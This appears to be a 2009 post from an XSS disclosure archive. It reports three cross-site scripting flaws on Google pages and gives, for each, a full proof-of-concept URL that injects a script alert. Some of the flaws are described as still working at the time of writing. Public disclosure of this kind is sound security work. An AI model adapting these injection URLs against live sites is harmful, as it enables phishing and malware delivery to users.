Advertisements

 Google SSL page vulnerable to XSS

Written by DP

Wednesday, 6 May 2009

A security researcher who goes by the nickname "Black-Hacker", has submitted to the archive a critical XSS vulnerability affecting a Google SSL page.

This bug can be exploited by malicious users to conduct phishing attacks against Google users and also to infect them with malware, adware and spyware.

Google XSSed:
https://www.google.com/support/bin/answer.py?%22%3E%3C/script%3E%3Cscript%3Ealert(%22XSSed%22)%3C/script%3E=00000&hl=tr (still working at time of writing)

Mirror

Screenshot:

----------------------------------------------------------------------------

"HackSever" submitted another Google XSS on 20/04/2009:

http://books.google.com/books?q=%22%3B%3E%3C%2Fnoscript%3E%3Cscript%3Ealert(%27test%27)%3B%3C%2Fscript%3E&btnG=Kitaplar%C4%B1+Ara&hl=tr (now fixed)

Mirror

----------------------------------------------------------------------------

Azat Harutyunyan is also credited for this discovery (still working at time of writing):

http://knol.google.com/k/knol/system/knol/pages/SearchToolkit?show=off&q=%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

Mirror

----------------------------------------------------------------------------

It is a matter of seconds before Google Security Team fixes all of the above XSS vulns.


        
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.